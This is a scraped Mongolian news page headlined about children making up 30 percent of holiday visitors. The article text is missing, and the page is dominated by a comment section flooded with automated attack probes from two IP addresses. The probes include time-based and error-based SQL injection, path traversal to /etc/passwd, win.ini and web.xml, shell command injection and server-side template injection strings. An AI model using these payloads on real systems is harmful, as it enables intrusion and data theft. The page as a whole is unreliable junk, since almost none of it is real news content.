Номын баярт зорин ирэгсдийн 30 хувь нь хүүхэд багачууд

ВИДЕО МЭДЭЭ
montastudio@montsame.gov.mn
2022-05-22 19:23:54
Холбоотой мэдээ
Сэтгэгдлүүд
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('g',11)='g 185.234.72.114 97 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('w',0)='w 185.234.72.114 97 өдөр

  123456
 • ../../../../WEB-INF/web.xml;admin 185.234.72.114 97 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:11 185.234.72.114 97 өдөр

  123456
 • ../../../../WEB-INF/web.xml 185.234.72.114 97 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:0 185.234.72.114 97 өдөр

  123456
 • ../../../WEB-INF/web.xml;admin 185.234.72.114 97 өдөр

  123456
 • ../../../WEB-INF/web.xml 185.234.72.114 97 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(11))::text>'0 185.234.72.114 97 өдөр

  123456
 • ../../WEB-INF/web.xml;admin 185.234.72.114 97 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0 185.234.72.114 97 өдөр

  123456
 • ../../WEB-INF/web.xml 185.234.72.114 97 өдөр

  123456
 • admin"and(select*from(select+sleep(11))a/**/union/**/select+1)=" 185.234.72.114 97 өдөр

  123456
 • ../WEB-INF/web.xml;admin 185.234.72.114 97 өдөр

  123456
 • admin"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 185.234.72.114 97 өдөр

  123456
 • ../WEB-INF/web.xml 185.234.72.114 97 өдөр

  123456
 • admin'and(select*from(select+sleep(11))a/**/union/**/select+1)=' 185.234.72.114 97 өдөр

  123456
 • WEB-INF/web.xml;admin 185.234.72.114 97 өдөр

  123456
 • admin'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 185.234.72.114 97 өдөр

  123456
 • WEB-INF/web.xml 185.234.72.114 97 өдөр

  123456
 • admin"and"o"="g 185.234.72.114 97 өдөр

  123456
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215Windows%u2215win%u002eini 185.234.72.114 97 өдөр

  123456
 • admin"and"t"="t 185.234.72.114 97 өдөр

  123456
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini 185.234.72.114 97 өдөр

  123456
 • admin'and'f'='c 185.234.72.114 97 өдөр

  123456
 • ../../../../../../Windows/win.iniadmin 185.234.72.114 97 өдөр

  123456
 • admin'and'y'='y 185.234.72.114 97 өдөр

  123456
 • ./../../../../../../Windows/win.ini 185.234.72.114 97 өдөр

  123456
 • admin 185.234.72.114 97 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('m',11)='m
 • ../../../../../../Windows/win.ini 185.234.72.114 97 өдөр

  123456
 • admin 185.234.72.114 97 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('q',0)='q
 • admin 185.234.72.114 97 өдөр

  123456/**/and/**/1=DBMS_PIPE.RECEIVE_MESSAGE('o',11)
 • admin 185.234.72.114 97 өдөр

  123456/**/and/**/0=DBMS_PIPE.RECEIVE_MESSAGE('o',0)
 • admin 185.234.72.114 97 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:11
 • ../../../../../../../../../../../../../../../../../../Windows/win.iniadmin 185.234.72.114 97 өдөр

  123456
 • ./../../../../../../../../../../../../../../../../../../Windows/win.ini 185.234.72.114 97 өдөр

  123456
 • admin 185.234.72.114 97 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:0
 • ../../../../../../../../../../../../../../../../../../Windows/win.ini 185.234.72.114 97 өдөр

  123456
 • admin 185.234.72.114 97 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:11'/**/
 • %u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216Windows%u2216win%u002eini 185.234.72.114 97 өдөр

  123456
 • admin 185.234.72.114 97 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
 • %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini 185.234.72.114 97 өдөр

  123456
 • ..\..\..\..\..\..\Windows\win.iniadmin 185.234.72.114 97 өдөр

  123456
 • .\..\..\..\..\..\..\Windows\win.ini 185.234.72.114 97 өдөр

  123456
 • admin 185.234.72.114 97 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(11))::text>'0
 • ..\..\..\..\..\..\Windows\win.ini 185.234.72.114 97 өдөр

  123456
 • admin 185.234.72.114 97 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
 • admin 185.234.72.114 97 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(11))>0/**/
 • admin 185.234.72.114 97 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
 • admin 185.234.72.114 97 өдөр

  123456"and(select*from(select+sleep(11))a/**/union/**/select+1)="
 • admin 185.234.72.114 97 өдөр

  123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
 • admin 185.234.72.114 97 өдөр

  123456'and(select*from(select+sleep(11))a/**/union/**/select+1)='
 • admin 185.234.72.114 97 өдөр

  123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
 • admin'"\( 185.234.72.114 97 өдөр

  123456
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.iniadmin 185.234.72.114 97 өдөр

  123456
 • admin 185.234.72.114 97 өдөр

  expr 979874107 + 847290667
 • admin 185.234.72.114 97 өдөр

  (select*from(select+sleep(11)union/**/select+1)a)
 • admin鎈'"\( 185.234.72.114 97 өдөр

  123456
 • .\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 185.234.72.114 97 өдөр

  123456
 • admin 185.234.72.114 97 өдөр

  123456&set /A 957988676+924183939
 • admin 185.234.72.114 97 өдөр

  (select*from(select+sleep(0)union/**/select+1)a)
 • admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1876155213')))>'0 185.234.72.114 97 өдөр

  123456
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 185.234.72.114 97 өдөр

  123456
 • admin 185.234.72.114 97 өдөр

  123456$(expr 983836582 + 814196458)
 • admin 185.234.72.114 97 өдөр

  123456
 • convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1960153920'))) 185.234.72.114 97 өдөр

  123456
 • %u2215etc%u2215passwd 185.234.72.114 97 өдөр

  123456
 • admin 185.234.72.114 97 өдөр

  <%- 830778142+880620310 %>
 • admin 185.234.72.114 97 өдөр

  123456|expr 976155831 + 983434124
 • admin 185.234.72.114 97 өдөр

  123456
 • admin/**/and/**/cast(md5('1329812285')as/**/int)>0 185.234.72.114 97 өдөр

  123456
 • %2fetc%2fpasswd 185.234.72.114 97 өдөр

  123456
 • admin 185.234.72.114 97 өдөр

  #set($c=828660359+803226705)${c}$c
 • admin 185.234.72.114 97 өдөр

  123456 expr 967331609 + 928035414
 • admin 185.234.72.114 97 өдөр

  123456
 • admin'and(select'1'from/**/cast(md5(1977945237)as/**/int))>'0 185.234.72.114 97 өдөр

  123456
 • /etc/passwdadmin 185.234.72.114 97 өдөр

  123456
 • admin 185.234.72.114 97 өдөр

  ${(832726804+946438193)?c}
 • admin 185.234.72.114 97 өдөр

  123456"and"v"="e
 • extractvalue(1,concat(char(126),md5(1738142450))) 185.234.72.114 97 өдөр

  123456
 • /etc/passwd 185.234.72.114 97 өдөр

  123456
 • admin 185.234.72.114 97 өдөр

  ${812628430+988183860}
 • admin 185.234.72.114 97 өдөр

  123456"and"e"="e
 • admin"and/**/extractvalue(1,concat(char(126),md5(1523367354)))and" 185.234.72.114 97 өдөр

  123456
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd 185.234.72.114 97 өдөр

  123456
 • admin 185.234.72.114 97 өдөр

  /*1*/{{909183705+914184693}}
 • admin 185.234.72.114 97 өдөр

  123456'and'y'='y
 • admin'and/**/extractvalue(1,concat(char(126),md5(1775301460)))and' 185.234.72.114 97 өдөр

  123456
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd 185.234.72.114 97 өдөр

  123456
 • ./../../../../../../etc/passwd 185.234.72.114 97 өдөр

  123456
 • admin 185.234.72.114 97 өдөр

  123456'and's'='s
 • ../../../../../../etc/passwdadmin 185.234.72.114 97 өдөр

  123456
 • admin 185.234.72.114 97 өдөр

  123456'"\(
 • admin 185.234.72.114 97 өдөр

  123456鎈'"\(
 • admin 185.234.72.114 97 өдөр

  '-var_dump(md5(270350321))-'
 • ../../../../../../etc/passwd 185.234.72.114 97 өдөр

  123456
 • admin 185.234.72.114 97 өдөр

  123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1684936171')))>'0
 • admin 185.234.72.114 97 өдөр

  ${@var_dump(md5(640941001))};
 • admin 185.234.72.114 97 өдөр

  convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1669419020')))
 • admin 185.234.72.114 97 өдөр

  123456/**/and/**/cast(md5('1528688889')as/**/int)>0
 • admin 185.234.72.114 97 өдөр

  123456/**/and+4=5
 • admin 185.234.72.114 97 өдөр

  123456'and(select'1'from/**/cast(md5(1525297758)as/**/int))>'0
 • admin 185.234.72.114 97 өдөр

  123456/**/and+2=2
 • admin 185.234.72.114 97 өдөр

  extractvalue(1,concat(char(126),md5(1680625047)))
 • admin 185.234.72.114 97 өдөр

  123456
 • expr 840264987 + 976577587 185.234.72.114 97 өдөр

  123456
 • admin 185.234.72.114 97 өдөр

  123456"and/**/extractvalue(1,concat(char(126),md5(1158142561)))and"
 • admin&set /A 918928694+850676516 185.234.72.114 97 өдөр

  123456
 • admin 185.234.72.114 97 өдөр

  123456
 • ltzzlrheblmkiarvreap 185.234.72.114 97 өдөр

  123456
 • ./../../../../../../../../../../../../../../../../../../etc/passwd 185.234.72.114 97 өдөр

  123456
 • <%- 810444783+972404126 %> 185.234.72.114 97 өдөр

  123456
 • admin$(expr 920749361 + 878264798) 185.234.72.114 97 өдөр

  123456
 • admin 185.234.72.114 97 өдөр

  123456'and/**/extractvalue(1,concat(char(126),md5(1677787547)))and'
 • ../../../../../../../../../../../../../../../../../../etc/passwdadmin 185.234.72.114 97 өдөр

  123456
 • admin 185.234.72.114 97 өдөр

  ltzzlrheblmkiarvreap
 • admin 185.234.72.114 97 өдөр

  123456
 • admin 185.234.72.114 97 өдөр

  123456
 • #set($c=977719723+996206301)${c}$c 185.234.72.114 97 өдөр

  123456
 • admin|expr 832042244 + 825864911 185.234.72.114 97 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwd 185.234.72.114 97 өдөр

  123456
 • '-var_dump(md5(384102840))-' 185.234.72.114 97 өдөр

  123456
 • admin 185.234.72.114 97 өдөр

  123456
 • ${963128933+842437381} 185.234.72.114 97 өдөр

  123456
 • ${(819045860+920894072)?c} 185.234.72.114 97 өдөр

  123456
 • ${910420905+845562348} 185.234.72.114 97 өдөр

  123456
 • admin 185.234.72.114 97 өдөр

  ${844574678+826330323}
 • ${@var_dump(md5(810275622))}; 185.234.72.114 97 өдөр

  123456
 • admin expr 980018419 + 966700822 185.234.72.114 97 өдөр

  123456
 • /*1*/{{942810868+905713690}} 185.234.72.114 97 өдөр

  123456
 • admin 185.234.72.114 97 өдөр

  123456
 • admin 185.234.72.114 97 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('e',8)='e 194.163.191.42 97 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('g',0)='g 194.163.191.42 97 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:8 194.163.191.42 97 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:0 194.163.191.42 97 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(8))::text>'0 194.163.191.42 97 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0 194.163.191.42 97 өдөр

  123456
 • admin"and(select*from(select+sleep(8))a/**/union/**/select+1)=" 194.163.191.42 97 өдөр

  123456
 • admin"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 194.163.191.42 97 өдөр

  123456
 • admin'and(select*from(select+sleep(8))a/**/union/**/select+1)=' 194.163.191.42 97 өдөр

  123456
 • admin'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 194.163.191.42 97 өдөр

  123456
 • admin"and"x"="a 194.163.191.42 97 өдөр

  123456
 • ../../../../WEB-INF/web.xml;admin 194.163.191.42 97 өдөр

  123456
 • admin"and"a"="a 194.163.191.42 97 өдөр

  123456
 • ../../../../WEB-INF/web.xml 194.163.191.42 97 өдөр

  123456
 • admin'and'z'='d 194.163.191.42 97 өдөр

  123456
 • ../../../WEB-INF/web.xml;admin 194.163.191.42 97 өдөр

  123456
 • ../../../WEB-INF/web.xml 194.163.191.42 97 өдөр

  123456
 • admin'and'x'='x 194.163.191.42 97 өдөр

  123456
 • ../../WEB-INF/web.xml;admin 194.163.191.42 97 өдөр

  123456
 • admin 194.163.191.42 97 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('m',8)='m
 • ../../WEB-INF/web.xml 194.163.191.42 97 өдөр

  123456
 • admin 194.163.191.42 97 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('x',0)='x
 • ../WEB-INF/web.xml;admin 194.163.191.42 97 өдөр

  123456
 • admin 194.163.191.42 97 өдөр

  123456/**/and/**/4=DBMS_PIPE.RECEIVE_MESSAGE('g',8)
 • ../WEB-INF/web.xml 194.163.191.42 97 өдөр

  123456
 • admin 194.163.191.42 97 өдөр

  123456/**/and/**/4=DBMS_PIPE.RECEIVE_MESSAGE('c',0)
 • WEB-INF/web.xml;admin 194.163.191.42 97 өдөр

  123456
 • WEB-INF/web.xml 194.163.191.42 97 өдөр

  123456
 • admin 194.163.191.42 97 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:8
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215Windows%u2215win%u002eini 194.163.191.42 97 өдөр

  123456
 • admin 194.163.191.42 97 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:0
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini 194.163.191.42 97 өдөр

  123456
 • admin 194.163.191.42 97 өдөр

  123456'"\(
 • admin 194.163.191.42 97 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:8'/**/
 • ../../../../../../Windows/win.iniadmin 194.163.191.42 97 өдөр

  123456
 • admin 194.163.191.42 97 өдөр

  123456鎈'"\(
 • admin 194.163.191.42 97 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
 • ./../../../../../../Windows/win.ini 194.163.191.42 97 өдөр

  123456
 • admin 194.163.191.42 97 өдөр

  123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1944730095')))>'0
 • ../../../../../../Windows/win.ini 194.163.191.42 97 өдөр

  123456
 • admin 194.163.191.42 97 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(8))::text>'0
 • admin 194.163.191.42 97 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
 • admin 194.163.191.42 97 өдөр

  convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1940521969')))
 • admin 194.163.191.42 97 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(8))>0/**/
 • admin 194.163.191.42 97 өдөр

  123456/**/and/**/cast(md5('1019404427')as/**/int)>0
 • admin 194.163.191.42 97 өдөр

  123456'and(select'1'from/**/cast(md5(1882122143)as/**/int))>'0
 • admin 194.163.191.42 97 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
 • admin 194.163.191.42 97 өдөр

  extractvalue(1,concat(char(126),md5(1414935363)))
 • admin 194.163.191.42 97 өдөр

  123456"and(select*from(select+sleep(8))a/**/union/**/select+1)="
 • admin 194.163.191.42 97 өдөр

  123456"and/**/extractvalue(1,concat(char(126),md5(1588163887)))and"
 • admin 194.163.191.42 97 өдөр

  123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
 • admin 194.163.191.42 97 өдөр

  123456'and/**/extractvalue(1,concat(char(126),md5(1945377075)))and'
 • admin 194.163.191.42 97 өдөр

  123456'and(select*from(select+sleep(8))a/**/union/**/select+1)='
 • ../../../../../../../../../../../../../../../../../../Windows/win.iniadmin 194.163.191.42 97 өдөр

  123456
 • admin 194.163.191.42 97 өдөр

  123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
 • ./../../../../../../../../../../../../../../../../../../Windows/win.ini 194.163.191.42 97 өдөр

  123456
 • admin 194.163.191.42 97 өдөр

  (select*from(select+sleep(8)union/**/select+1)a)
 • ../../../../../../../../../../../../../../../../../../Windows/win.ini 194.163.191.42 97 өдөр

  123456
 • %u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216Windows%u2216win%u002eini 194.163.191.42 97 өдөр

  123456
 • admin 194.163.191.42 97 өдөр

  (select*from(select+sleep(0)union/**/select+1)a)
 • admin 194.163.191.42 97 өдөр

  123456"and"p"="g
 • %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini 194.163.191.42 97 өдөр

  123456
 • admin 194.163.191.42 97 өдөр

  123456"and"k"="k
 • ..\..\..\..\..\..\Windows\win.iniadmin 194.163.191.42 97 өдөр

  123456
 • admin 194.163.191.42 97 өдөр

  123456'and'i'='f
 • admin 194.163.191.42 97 өдөр

  123456'and'x'='x
 • .\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 97 өдөр

  123456
 • ..\..\..\..\..\..\Windows\win.ini 194.163.191.42 97 өдөр

  123456
 • admin 194.163.191.42 97 өдөр

  123456/**/and+0=6
 • admin 194.163.191.42 97 өдөр

  123456/**/and+1=1
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.iniadmin 194.163.191.42 97 өдөр

  123456
 • admin 194.163.191.42 97 өдөр

  <%- 923957493+822800932 %>
 • admin 194.163.191.42 97 өдөр

  #set($c=912319909+847843573)${c}$c
 • .\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 97 өдөр

  123456
 • admin 194.163.191.42 97 өдөр

  ${(877971850+994056144)?c}
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 97 өдөр

  123456
 • %u2215etc%u2215passwd 194.163.191.42 97 өдөр

  123456
 • admin 194.163.191.42 97 өдөр

  ${948064921+928661395}
 • %2fetc%2fpasswd 194.163.191.42 97 өдөр

  123456
 • /etc/passwdadmin 194.163.191.42 97 өдөр

  123456
 • /etc/passwd 194.163.191.42 97 өдөр

  123456
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd 194.163.191.42 97 өдөр

  123456
 • admin 194.163.191.42 97 өдөр

  /*1*/{{964296265+926270558}}
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd 194.163.191.42 97 өдөр

  123456
 • ./../../../../../../etc/passwd 194.163.191.42 97 өдөр

  123456
 • admin'"\( 194.163.191.42 97 өдөр

  123456
 • admin鎈'"\( 194.163.191.42 97 өдөр

  123456
 • ../../../../../../etc/passwdadmin 194.163.191.42 97 өдөр

  123456
 • admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1411644521')))>'0 194.163.191.42 97 өдөр

  123456
 • admin 194.163.191.42 97 өдөр

  123456
 • ../../../../../../etc/passwd 194.163.191.42 97 өдөр

  123456
 • admin 194.163.191.42 97 өдөр

  123456
 • admin 194.163.191.42 97 өдөр

  '-var_dump(md5(140997290))-'
 • convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1091660866'))) 194.163.191.42 97 өдөр

  123456
 • expr 998962444 + 802587130 194.163.191.42 97 өдөр

  123456
 • admin/**/and/**/cast(md5('1230600940')as/**/int)>0 194.163.191.42 97 өдөр

  123456
 • admin 194.163.191.42 97 өдөр

  123456
 • admin&set /A 870432164+898273118 194.163.191.42 97 өдөр

  123456
 • admin'and(select'1'from/**/cast(md5(1509922754)as/**/int))>'0 194.163.191.42 97 өдөр

  123456
 • <%- 940151795+875137772 %> 194.163.191.42 97 өдөр

  123456
 • extractvalue(1,concat(char(126),md5(1975323915))) 194.163.191.42 97 өдөр

  123456
 • admin$(expr 816200570 + 924455595) 194.163.191.42 97 өдөр

  123456
 • ./../../../../../../../../../../../../../../../../../../etc/passwd 194.163.191.42 97 өдөр

  123456
 • admin|expr 900002635 + 875423714 194.163.191.42 97 өдөр

  123456
 • admin"and/**/extractvalue(1,concat(char(126),md5(1980714823)))and" 194.163.191.42 97 өдөр

  123456
 • #set($c=812170364+894774164)${c}$c 194.163.191.42 97 өдөр

  123456
 • admin expr 825523145 + 921183896 194.163.191.42 97 өдөр

  123456
 • admin 194.163.191.42 97 өдөр

  123456
 • ${(805617762+956398213)?c} 194.163.191.42 97 өдөр

  123456
 • xnphbegvhnnsgpksvfow 194.163.191.42 97 өдөр

  123456
 • admin 194.163.191.42 97 өдөр

  expr 879581986 + 905270591
 • admin 194.163.191.42 97 өдөр

  123456
 • admin 194.163.191.42 97 өдөр

  123456&set /A 801128302+995006503
 • ../../../../../../../../../../../../../../../../../../etc/passwdadmin 194.163.191.42 97 өдөр

  123456
 • admin 194.163.191.42 97 өдөр

  ${@var_dump(md5(900400223))};
 • admin 194.163.191.42 97 өдөр

  xnphbegvhnnsgpksvfow
 • admin'and/**/extractvalue(1,concat(char(126),md5(1566724361)))and' 194.163.191.42 97 өдөр

  123456
 • admin 194.163.191.42 97 өдөр

  123456$(expr 882583434 + 813432118)
 • admin 194.163.191.42 97 өдөр

  123456
 • ${936103845+891003039} 194.163.191.42 97 өдөр

  123456
 • admin 194.163.191.42 97 өдөр

  123456
 • admin 194.163.191.42 97 өдөр

  123456|expr 915998614 + 800198218
 • ${809255991+807907111} 194.163.191.42 97 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwd 194.163.191.42 97 өдөр

  123456
 • '-var_dump(md5(680598844))-' 194.163.191.42 97 өдөр

  123456
 • /*1*/{{887964484+871688028}} 194.163.191.42 97 өдөр

  123456
 • admin 194.163.191.42 97 өдөр

  123456
 • admin 194.163.191.42 97 өдөр

  ${889949731+993783824}
 • admin 194.163.191.42 97 өдөр

  123456 expr 832550921 + 858926811
 • ${@var_dump(md5(476511582))}; 194.163.191.42 97 өдөр

  123456
 • admin 194.163.191.42 97 өдөр

  123456
 • admin 194.163.191.42 97 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('s',11)='s 194.163.191.42 132 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('b',0)='b 194.163.191.42 132 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:11 194.163.191.42 132 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:0 194.163.191.42 132 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(11))::text>'0 194.163.191.42 132 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0 194.163.191.42 132 өдөр

  123456
 • admin"and(select*from(select+sleep(11))a/**/union/**/select+1)=" 194.163.191.42 132 өдөр

  123456
 • admin"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 194.163.191.42 132 өдөр

  123456
 • admin'and(select*from(select+sleep(11))a/**/union/**/select+1)=' 194.163.191.42 132 өдөр

  123456
 • admin'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 194.163.191.42 132 өдөр

  123456
 • ../../../../WEB-INF/web.xml;admin 194.163.191.42 132 өдөр

  123456
 • ../../../../WEB-INF/web.xml 194.163.191.42 132 өдөр

  123456
 • admin"and"z"="z 194.163.191.42 132 өдөр

  123456
 • admin"and"x"="x 194.163.191.42 132 өдөр

  123456
 • ../../../WEB-INF/web.xml;admin 194.163.191.42 132 өдөр

  123456
 • admin'and'c'='o 194.163.191.42 132 өдөр

  123456
 • ../../../WEB-INF/web.xml 194.163.191.42 132 өдөр

  123456
 • admin'and'g'='g 194.163.191.42 132 өдөр

  123456
 • ../../WEB-INF/web.xml;admin 194.163.191.42 132 өдөр

  123456
 • admin 194.163.191.42 132 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('m',11)='m
 • ../../WEB-INF/web.xml 194.163.191.42 132 өдөр

  123456
 • admin 194.163.191.42 132 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('g',0)='g
 • ../WEB-INF/web.xml;admin 194.163.191.42 132 өдөр

  123456
 • admin 194.163.191.42 132 өдөр

  123456/**/and/**/1=DBMS_PIPE.RECEIVE_MESSAGE('d',11)
 • ../WEB-INF/web.xml 194.163.191.42 132 өдөр

  123456
 • admin 194.163.191.42 132 өдөр

  123456/**/and/**/3=DBMS_PIPE.RECEIVE_MESSAGE('s',0)
 • WEB-INF/web.xml;admin 194.163.191.42 132 өдөр

  123456
 • WEB-INF/web.xml 194.163.191.42 132 өдөр

  123456
 • admin 194.163.191.42 132 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:11
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215Windows%u2215win%u002eini 194.163.191.42 132 өдөр

  123456
 • admin 194.163.191.42 132 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:0
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini 194.163.191.42 132 өдөр

  123456
 • admin 194.163.191.42 132 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:11'/**/
 • ../../../../../../Windows/win.iniadmin 194.163.191.42 132 өдөр

  123456
 • admin 194.163.191.42 132 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
 • ./../../../../../../Windows/win.ini 194.163.191.42 132 өдөр

  123456
 • ../../../../../../Windows/win.ini 194.163.191.42 132 өдөр

  123456
 • admin 194.163.191.42 132 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(11))::text>'0
 • admin'"\( 194.163.191.42 132 өдөр

  123456
 • admin 194.163.191.42 132 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
 • admin鎈'"\( 194.163.191.42 132 өдөр

  123456
 • admin 194.163.191.42 132 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(11))>0/**/
 • admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1895182710')))>'0 194.163.191.42 132 өдөр

  123456
 • admin 194.163.191.42 132 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
 • convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1838460260'))) 194.163.191.42 132 өдөр

  123456
 • admin/**/and/**/cast(md5('1462305192')as/**/int)>0 194.163.191.42 132 өдөр

  123456
 • admin 194.163.191.42 132 өдөр

  123456"and(select*from(select+sleep(11))a/**/union/**/select+1)="
 • admin 194.163.191.42 132 өдөр

  123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
 • ../../../../../../../../../../../../../../../../../../Windows/win.iniadmin 194.163.191.42 132 өдөр

  123456
 • admin'and(select'1'from/**/cast(md5(1835124395)as/**/int))>'0 194.163.191.42 132 өдөр

  123456
 • admin 194.163.191.42 132 өдөр

  123456'and(select*from(select+sleep(11))a/**/union/**/select+1)='
 • ./../../../../../../../../../../../../../../../../../../Windows/win.ini 194.163.191.42 132 өдөр

  123456
 • admin 194.163.191.42 132 өдөр

  123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
 • admin 194.163.191.42 132 өдөр

  (select*from(select+sleep(11)union/**/select+1)a)
 • ../../../../../../../../../../../../../../../../../../Windows/win.ini 194.163.191.42 132 өдөр

  123456
 • extractvalue(1,concat(char(126),md5(1182367674))) 194.163.191.42 132 өдөр

  123456
 • admin 194.163.191.42 132 өдөр

  (select*from(select+sleep(0)union/**/select+1)a)
 • %u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216Windows%u2216win%u002eini 194.163.191.42 132 өдөр

  123456
 • admin"and/**/extractvalue(1,concat(char(126),md5(1832708930)))and" 194.163.191.42 132 өдөр

  123456
 • admin 194.163.191.42 132 өдөр

  123456"and"d"="n
 • %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini 194.163.191.42 132 өдөр

  123456
